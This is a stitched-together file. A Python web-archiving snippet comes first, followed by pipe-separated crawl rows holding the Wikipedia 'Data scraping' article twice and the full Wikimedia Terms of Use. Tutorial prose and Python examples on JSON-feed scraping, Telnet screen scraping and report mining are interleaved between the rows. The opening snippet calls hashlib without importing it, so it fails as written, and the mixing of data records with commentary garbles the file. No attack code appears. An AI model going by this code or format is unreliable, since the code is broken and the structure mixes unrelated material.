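import json
import time
from pathlib import Path

import requests

ARCHIVE_DIR = Path("web_archive")   # hypothetical local store
ARCHIVE_DIR.mkdir(exist_ok=True)
seen_hashes = set()

def archive_response(url):
    """Fetch a URL, skip exact duplicates, and store the raw bytes plus metadata."""
    response = requests.get(url, timeout=10)
    digest = hashlib.sha256(response.content).hexdigest()
    if digest in seen_hashes:        # filter duplicate content, as the article describes
        print(f"Skipping duplicate content for {url}")
        return
    seen_hashes.add(digest)
    record = {
        "url": url,
        "fetched_at": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        "status": response.status_code,
        "content_type": response.headers.get("Content-Type", ""),
        "sha256": digest,
    }
    (ARCHIVE_DIR / f"{digest}.bin").write_bytes(response.content)              # the stored bitstream
    (ARCHIVE_DIR / f"{digest}.json").write_text(json.dumps(record, indent=2))  # its metadata
    print(f"Archived {url} ({len(response.content)} bytes)")

archive_response("https://example.com/")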
383 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-10 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
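The data-scraping entry above notes that newer scrapers often skip the rendered HTML and instead listen to the JSON data feeds a site serves to its own front end, storing the result for subsequent analysis. Below is a hedged sketch of that approach using requests and pandas (both imported earlier); the feed URL, its response shape (a list of flat JSON objects), and the output filename are assumptions, so substitute a real endpoint you are permitted to query.

import pandas as pd
import requests

FEED_URL = "https://example.com/api/articles.json"   # hypothetical JSON endpoint

response = requests.get(FEED_URL, timeout=10)
response.raise_for_status()
records = response.json()            # assumed here to be a list of flat JSON objects

# Flatten into a DataFrame and persist for later analysis, as the article describes.
df = pd.json_normalize(records)
df.to_csv("scraped_feed.csv", index=False)
print(df.head())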
384 | https://en.wikipedia.org/wiki/Data_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Terms_of_Use | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. You are free to: Under the following conditions: With the understanding that: If you need help or you want to report a violation of these Terms of Use you can: Our Terms of Use Imagine a world in which every single human being can freely share in the sum of all knowledge. That's our commitment. Our Vision Statement Welcome to Wikimedia The Wikimedia Foundation, Inc. ("we" or "us" or "Foundation"), is a non-profit charitable organization, headquartered in San Francisco, California, United States, whose mission is to empower and engage people around the world to collect and develop content under a free license or in the public domain, and to disseminate it effectively and globally, free of charge. To support our vibrant community, we provide the essential infrastructure and organizational framework for the development of multilingual wiki projects and their editions (as explained on our Wikimedia Projects page) (hereby referred to as "Projects") and other endeavors which serve this mission. We strive to make and keep educational and informational content from the Projects available on the internet free of charge, in perpetuity. We welcome you ("you" or the "user") as a reader, or contributor of the Projects, and we encourage you to join the Wikimedia community. Before you participate, however, we ask that you please read and agree to the following Terms of Use ("Terms of Use"). These Terms of Use tell you about our public services at the Wikimedia Foundation, our relationship to you as a user, and the rights and responsibilities that guide us both. We host an incredible quantity of educational and informational content, all of which is contributed and made possible by users like yourself. Generally we do not contribute, monitor, or delete content (with rare exceptions, such as under policies like these Terms of Use, for legal compliance, or when faced with urgent threats of serious harm). This means that editorial control is in the hands of you and your fellow users who create and manage the content. The community the network of users who are constantly building and using the Projects and or their websites (hereby referred to as "Project Websites") is the principal means through which the goals of the mission are achieved. The community contributes to and helps govern our Projects and Project Websites. The community also undertakes the critical function of creating and enforcing policies for the specific Project editions (such as the different language editions for the Wikipedia Project or the Wikimedia Commons multilingual edition). You, the user, are welcome to join as a contributor, editor, or author, but you should follow the policies that govern each of the independent Project editions, including the Universal Code of Conduct (UCoC), which apply to all Project editions. The largest of our Projects is Wikipedia, but we host other Projects too, each with different objectives and work methods. Each Project edition has a team of contributors, editors or authors who work together to create and manage the content on that Project edition. You are welcome to join these teams and work with them to improve these Projects. 
Since we are dedicated to making content freely accessible to the public, content you contribute is made available under a free license or released in the public domain. Please be aware that you are legally responsible for all of your contributions, edits, and reuse of Wikimedia content under the laws of the United States of America and other applicable laws (which may include laws where you or the subject of your contributions are located). This means it is important that you exercise caution when posting, modifying or reusing content. In light of this responsibility, we have some rules about what you cannot do, most of which are either for your own protection or for the protection of other users like yourself. Please keep in mind that the content we host is for general informational purposes only, so if you need expert advice for a particular question (such as medical, legal, or financial issues), you should seek the help of an appropriate professional. We also include other important notices and disclaimers, so please read these Terms of Use in their entirety. For clarity, other organizations, such as local Wikimedia chapters and associations, that may share in the same mission are nevertheless legally independent and separate from the Wikimedia Foundation. Unless otherwise stated by the Foundation as an authorized party on a given Project's Website, those other organizations have no responsibility for the operations of the Project's Website or its content. The Wikimedia Foundation is dedicated to encouraging the growth, development, and distribution of free multilingual content, and to hosting the full content of these wiki-based Projects for the public free of charge. Our role is to host some of the largest collaboratively edited reference Projects in the world, which can be found here. However, we act only as a hosting service provider, maintaining the infrastructure and organizational framework. This infrastructure and framework allow our users to build the Projects by contributing and editing content themselves. They also allow our users to reuse that content. The infrastructure we maintain includes specialized technological infrastructure that enables users to programmatically interact with and reuse content on Projects (referred to as "Application Programming Interface" or "APIs"), and mobile applications. As used throughout the rest of the Terms of Use, our services consist of: The Project Websites we host, technological infrastructure that we maintain, and any technical spaces that we host for the maintenance and improvement of our Projects. Because of our unique role, there are a couple of things you should be aware of when considering our relationship to you, the Projects, and other users: We ask that you review the terms of our Privacy Policy, so that you are aware of how we collect and use your information. The Projects hosted by the Wikimedia Foundation only exist because of the vibrant community of users like you who collaborate to write, edit, and curate the content. We happily welcome your participation in this community. We encourage you to be civil and polite in your interactions with others in the community, to act in good faith, and to make edits and contributions aimed at furthering the mission of the shared Project. We ask that all users review and follow the Universal Code of Conduct ("UCoC"), which lays out requirements for collegial, civil collaboration across all Projects that we host. 
Certain activities, whether legal or illegal under the applicable law, may be harmful to other users and violate our rules, and some activities may also subject you to liability. Therefore, for your own protection and for that of other users, you may not engage in such activities on, or otherwise using, our Projects. These activities include: We reserve the right to exercise our enforcement discretion with respect to the provisions in section 4 of these Terms of Use. Where required, enforcement of these terms may include actions not listed in the Wikimedia Foundation Office Action Policy. If enforcement is required in new circumstances, we will make an effort within at most one (1) year to update the Office Action Policy to catalog the new type of action. Marketing Company Mediations Undisclosed editing by users receiving compensation creates an unreasonable burden on volunteer editors who investigate and enforce community policies. Therefore, for violations of this section related to undisclosed paid editing, you agree to submit to binding "Med-Arb" (a "Marketing Company Mediation") as described in section 14 of these Terms of Use. You are responsible for safeguarding your own password and other security credentials, and should never disclose them to any third party. Although you have considerable freedoms for reuse of the content on the Project Websites, it is important that, at the Wikimedia Foundation, we protect our trademark rights so that we can protect our users from fraudulent impersonators. Because of this, we ask that you please respect our trademarks. All Wikimedia Foundation trademarks belong to the Wikimedia Foundation, and any use of our trade names, trademarks, service marks, logos, or domain names must be in compliance with these Terms of Use and in compliance with our Trademark Policy. To grow the commons of free knowledge and free culture, all users contributing to the Projects or Project Websites are required to grant broad permissions to the general public to redistribute and reuse their contributions freely, so long as that use is properly attributed and the same freedom to reuse and redistribute is granted to any derivative works. In keeping with our goal of providing free information to the widest possible audience, we require that when necessary all submitted content be licensed so that it is freely reusable by anyone who may access it. You agree to the following licensing requirements: If the text content was imported from another source, it is possible that the content is licensed under a compatible CC BY-SA license but not GFDL (as described in "Importing text, above). In that case, you agree to comply with the compatible CC BY-SA license and do not have the option to relicense it under GFDL. To determine the license that applies to the content that you seek to reuse or redistribute, you should review the page footer, page history, and discussion page. In addition, please be aware that text that originated from external sources and was imported into a Project may be under a license that attaches additional attribution requirements. Users agree to indicate these additional attribution requirements clearly. Depending on the Project, such requirements may appear, for example, in a banner or other notations pointing out that some or all of the content was originally published elsewhere. Where there are such visible notations, reusers should preserve them. 
The Wikimedia Foundation wants to ensure that the content that we host can be reused by other users without fear of liability and that it is not infringing the proprietary rights of others. In fairness to our users, as well as to other creators and copyright holders, our policy is to respond to notices of alleged infringement that comply with the formalities of the Digital Millennium Copyright Act ("DMCA"). Pursuant to the DMCA, we will terminate, in appropriate circumstances, users and account holders of our system and network who are repeat infringers on our Projects and services. However, we also recognize that not every takedown notice is valid or in good faith. In such cases, we strongly encourage users to file counter-notifications when they appropriately believe a DMCA takedown demand is invalid or improper. For more information on what to do if you think a DMCA notice has been improperly filed, you may wish to consult the Lumen Database website. If you are the owner of content that is being improperly used on one of the Projects without your permission, you may request that the content be removed by filing a notice under the DMCA. To make such a request, please email us at legalwikimediaorg or snail mail our designated agent. Alternatively, you may make a request to our community, which often handles copyright issues faster and more effectively than the process prescribed under the DMCA. In that case, you can post a notice explaining your copyright concerns. For a non-exhaustive and non-authoritative list of the relevant processes for the different Project editions, visit the Copyright Problems page. Before filing a DMCA claim, you also have the option of sending an email to the community at infowikimediaorg. You are solely responsible for your use of any third-party websites or resources. Although the Projects and Project Websites contain links to third-party websites and resources, we do not endorse and are not responsible or liable for their availability, accuracy, or the related content, products, or services (including, without limitation, any viruses or other disabling features), nor do we have any obligation to monitor such third-party content. The community has the primary role in creating and enforcing policies applying to the different Project editions. At the Wikimedia Foundation, we rarely intervene in community decisions about policy and its enforcement. It is possible to notify us of illegal content, or content that violates our Terms of Use (including all policies and other documents incorporated by reference) for other reasons by contacting us directly. However, you can typically make a request directly to the Project's community: this may be more efficient, and is more consistent with our Projects' aim to empower the user community. Each Project will usually provide "Help" or "Contact" pages for further guidance, or specific tools for reporting issues. Alternatively if in doubt you can ask members of the community for help, by sending an email to infowikimediaorg or a more language-specific address from the Volunteer Response Team page. Please note that these mailboxes are monitored by users of the Projects, not the Foundation. As a result, they should not be threatened or issued with legal demands. If you contact the Foundation with a problem, we will typically explore whether and how existing community-led mechanisms can investigate and, where appropriate, resolve it. 
In an unusual case, the need may arise, or the community may ask us, to address an especially problematic user or especially problematic content because of significant Project disturbance or dangerous behavior. In such cases, we reserve the right, at our sole discretion (or where legally compelled), to: Those Foundation moderation activities may be informed or performed by software (such as traffic flood ("Denial of Service") protection). In those cases human review is normally available, upon request. In the interests of our users and the Projects, in the extreme circumstance that any individual has had their account or access blocked under this section, they are prohibited from creating or using another account on or seeking access to the same Project, unless we provide explicit permission. Without limiting the authority of the community, the Foundation itself will not ban a user from editing or contributing or block a user's account or access solely because of good faith criticism that does not result in actions otherwise violating these Terms of Use or community policies. The Wikimedia community and its members may also take action when so allowed by the community or Foundation policies applicable to the specific Project edition, including but not limited to warning, investigating, blocking, or banning users who violate those policies. You agree to comply with the final decisions of dispute resolution bodies that are established by the community for the specific Project editions (such as arbitration committees); these decisions may include sanctions as set out by the policy of the specific Project edition. Especially problematic users who have had accounts or access blocked on multiple Project editions may be subject to a ban from all of the Project editions, in accordance with the Global Ban Policy. In contrast to Board resolutions or these Terms of Use, policies established by the community, which may cover a single Project edition or multiple Projects editions (like the Global Ban Policy), may be modified by the relevant community according to its own procedures. The blocking of an account or access or the banning of a user under this provision shall be in accordance with Section 13 of these Terms of Use. If you believe we have not satisfactorily acted on a problematic content report, or if you have been subjected to a Foundation moderation action that you wish to challenge, you may be able to submit an appeal. Other information about routes of appeal may also be explained to you at the time, or in Project-specific help pages. We reserve the right to suspend (temporarily, or permanently) our handling of reports or other correspondence from users or third parties, whether about allegedly illegal or otherwise problematic content or conduct, or requesting appeals against moderation actions, if such correspondence was made in bad faith, repetitive, unfounded, and or abusive. In appropriate circumstances, your email address may even be blocked on our email system(s), and you will then need to contact us at our postal address if you wish to further correspond with us during that block. For less serious cases (e.g. up to three polite emails about one or more meritless complaints), this is likely to be temporary. More frequent or more abusive communications are more likely to lead to permanent measures. The Wikimedia Foundation Board of Trustees releases official policies from time to time. 
Some of these policies may be mandatory for a particular Project or Project edition, and, when they are, you agree to abide by them as applicable. We make available a set of APIs, which include documentation and associated tools, to enable users to build products that promote free knowledge. By using our APIs, you agree to abide by all applicable policies governing the use of the APIs, which include but are not limited to the User-Agent Policy, the Robot Policy, and the API:Etiquette (collectively, "API Documentation"), which are incorporated into these Terms of Use by reference. Though we hope you will stay and continue to contribute to the Projects, you can stop using our services any time. In certain (hopefully unlikely) circumstances it may be necessary for either ourselves or the Wikimedia community or its members (as described in Section 10) to terminate part or all of our services, terminate these Terms of Use, block your account or access, or ban you as a user. If your account or access is blocked or otherwise terminated for any reason, your public contributions and a record of your activities on or in relation to the Projects (including any correspondence you have sent us) will be unaffected (subject to applicable policies), and you may still access our public pages for the sole purpose of reading publicly available content on the Projects. In such circumstances, however, you may not be able to access your account or settings. However, regardless of any other provision in these Terms of Use, we reserve the right to suspend or end the services at any time, with or without cause, and with or without notice. Even after your use and participation are banned, blocked or otherwise suspended, these Terms of Use will remain in effect with respect to relevant provisions, including Sections 1, 3, 4, 6, 7, 9 16, and 18. We hope that no serious disagreements arise involving you, but, in the event there is a dispute, we encourage you to seek resolution through the dispute resolution procedures or mechanisms provided by the Projects or Project editions and the Wikimedia Foundation. If you seek to file a legal claim against us, you agree to file and resolve it exclusively in a state or federal court located in San Francisco County, California. You also agree that the laws of the State of California and, to the extent applicable, the laws of the United States of America will govern these Terms of Use, as well as any legal claim that might arise between you and us (without reference to conflict of laws principles). You agree to submit to the personal jurisdiction of, and agree that venue is proper in, the courts located in San Francisco County, California, in any legal action or proceeding relating to us or these Terms of Use. To ensure that disputes are dealt with soon after they arise, you agree that regardless of any statute or law to the contrary, any claim or cause of action you might have arising out of or related to use of our services or these Terms of Use must be filed within the applicable statute of limitations or, if earlier, one (1) year after the pertinent facts underlying such claim or cause of action could have been discovered with reasonable diligence (or be forever barred). Marketing Company Mediations As described in section 4 of these Terms of Use, you agree to resolve violations of the Paid Contributions without Disclosure in a Marketing Company Mediation at the Foundation's discretion. 
Marketing Company Mediations are binding mediations where, at the end of either a half or full day session, any disputed items that remain unresolved will be decided by the mediator in a legally binding decision. They will be conducted in meetings by teleconference or videoconference. If an in-person meeting is required, then the Marketing Company Mediation will take place in San Francisco County, California. The parties will split all fees and expenses related to the mediation arbitration equally. You agree, as part of a Marketing Company Mediation, to cooperate with the Foundation, including by timely providing any documentation in your possession relating to your undisclosed paid editing activities including the accounts used, articles affected, and clients who purchased such services. Marketing Company Mediations are subject to and governed by the Federal Arbitration Act to the extent that the mediator becomes an arbitrator. The prevailing party shall be entitled to recover its attorneys' fees (including all fees necessary to determine the applicability of the Marketing Company Mediation and to enforce the binding result) and all costs relating to the investigation and enforcement of its rights. A party may be deemed "prevailing" even if it is not successful on every claim asserted. If for some reason the entirety of these Marketing Company Mediation requirements are found to be unenforceable, you agree to resolve any disputes as described in the beginning of this section. Highlighted for emphasis At the Wikimedia Foundation, we do our best to provide educational and informational content to a very wide audience, but your use of our services is at your sole risk. We provide these services on an "as is" and "as available" basis, and we expressly disclaim all express or implied warranties of all kinds, including but not limited to the implied warranties of merchantability, fitness for a particular purpose, and non-infringement. We make no warranty that our services will meet your requirements, be safe, secure, uninterrupted, timely, accurate, or error-free, or that your information will be secure. We are not responsible for the content, data, or actions of third parties, and you release us, our directors, officers, employees, and agents from any claims and damages, known and unknown, arising out of or in any way connected with any claim you have against any such third parties. No advice or information, whether oral or written, obtained by you from us or through or from our services creates any warranty not expressly stated in these Terms of Use. Any material downloaded or otherwise obtained through your use of our services is done at your own discretion and risk, and you will be solely responsible for any damage to your computer system or loss of data that results from the download of any such material. You agree that we have no responsibility or liability for the deletion of, or the failure to store or to transmit, any content or communication maintained by the service. We retain the right to create limits on use and storage at our sole discretion at any time with or without notice. Highlighted for emphasis Just as the Wikimedia community's input is essential for the growth and maintenance of the Projects, we believe that community input is essential for these Terms of Use to properly serve our users. It is also essential for a fair contract. 
Therefore, we will provide these Terms of Use, as well as any substantial future revisions of these Terms of Use, to the community for comment at least thirty (30) days before the end of the comment period. If a future proposed revision is substantial, we will provide an additional 30 days for comments after posting a translation of the proposed revision in at least three languages (selected at our discretion). The community will be encouraged to translate the proposed revision in other languages as appropriate. For changes for legal or administrative reasons, to correct an inaccurate statement, or changes in response to community comments, we will provide at least three (3) days' notice. Because it may be necessary to modify these Terms of Use from time to time, we will provide notice of such modifications and the opportunity to comment via the Project websites, and via a notification on WikimediaAnnounce-l. However, we ask that you please periodically review the most up-to-date version of these Terms of Use. Your continued use of our services after the new Terms of Use become official following the notice and review period constitutes an acceptance of these Terms of Use on your part. For the protection of the Wikimedia Foundation and other users like yourself, if you do not agree with our Terms of Use, you cannot use our services. These Terms of Use do not create an employment, agency, partnership, joint control or joint venture relationship between you and us, the Wikimedia Foundation. For the purposes of European Economic Area law, United Kingdom law, or other laws that involve a similar concept, you are not acting "under the authority of" the Foundation when you use the services. If you have not signed a separate agreement with us, these Terms of Use are the entire agreement between you and us. If there is any conflict between these Terms of Use and a signed written agreement between you and us, the signed agreement will control. You agree that we may provide you with notices, including those regarding changes to the Terms of Use, by email, regular mail, or postings on the Projects or Project Websites. If in any circumstance, we do not apply or enforce any provision of these Terms of Use, it is not a waiver of that provision. You understand that, unless otherwise agreed to in writing by us, you have no expectation of compensation for any activity, contribution, or idea that you provide to us, the community, or the Projects or Project editions. Notwithstanding any provision to the contrary in these Terms of Use, we (the Wikimedia Foundation) and you agree not to modify the applicable terms and requirements of any free license that is employed on the Projects or Project editions when such free license is authorized by these Terms of Use. These Terms of Use were written in English (U.S.). While we hope that translations of these Terms of Use are accurate, in the event of any differences in meaning between the original English version and a translation, the original English version takes precedence. If any provision or part of a provision of these Terms of Use is found unlawful, void, or unenforceable, that provision or part of the provision is deemed severable from these Terms of Use and will be enforced to the maximum extent permissible, and all other provisions of these Terms of Use will remain in full force and effect. We appreciate your taking the time to read these Terms of Use, and we are very happy to have you contributing to the Projects and using our services. 
Through your contributions, you are helping to build something really big: not only an important collection of collaboratively edited reference Projects that provides education and information to millions who might otherwise lack access, but also a vibrant community of like-minded and engaged peers, focused on a very noble goal. These Terms of Use went into effect on June 7, 2023. Previous versions of the terms: Please note that in the event of any differences in meaning or interpretation between the original English version of this content and a translation, the original English version takes precedence. |
385 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
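The Telnet-based screen scraper described above can be sketched in a few lines of Python. This is only an illustration: the host name, prompts, menu command, and report layout are all invented, and the standard-library telnetlib module it relies on was removed in Python 3.13, so treat it as a sketch of the idea rather than working integration code.

# Hypothetical sketch of a Telnet screen scraper for a text-based legacy system.
# The host, port, prompts, and report command below are invented for illustration.
# Note: telnetlib ships with Python 3.12 and earlier (it was removed in 3.13).
import re
import telnetlib

HOST = "legacy.example.com"   # hypothetical legacy host
PORT = 23

with telnetlib.Telnet(HOST, PORT, timeout=10) as tn:
    tn.read_until(b"login: ", timeout=10)
    tn.write(b"report_user\n")          # emulate the keystrokes a human would type
    tn.read_until(b"MENU>", timeout=10)
    tn.write(b"PRINT DAILY SALES\n")    # navigate the old text interface
    screen = tn.read_until(b"END OF REPORT", timeout=30).decode("ascii", "replace")

# Process the display output: pull "ITEM  QTY  PRICE"-style lines out of the screen text.
rows = re.findall(r"^(\w+)\s+(\d+)\s+([\d.]+)\s*$", screen, flags=re.MULTILINE)
print(rows)  # e.g. [('WIDGET', '12', '3.50'), ...] ready to hand to a modern system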
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
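As a minimal illustration of the report-mining idea above, the snippet below treats a small fixed-width "spool file" style report as plain text and loads it with pandas.read_fwf; the report layout and figures are invented for the example.

# Minimal report-mining sketch: parse a fixed-width spool-file-style report offline.
# The column names, widths, and numbers are invented for illustration.
from io import StringIO
import pandas as pd

spool = StringIO(
    "CUSTOMER      REGION   TOTAL\n"
    "Acme Corp     West     1200.50\n"
    "Bolt Ltd      East     310.00\n"
)

# read_fwf infers the fixed-width columns, turning the printed report into structured rows
df = pd.read_fwf(spool)
print(df)
print(df["TOTAL"].sum())   # expected: 1510.5, analysis the printed report alone cannot offer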
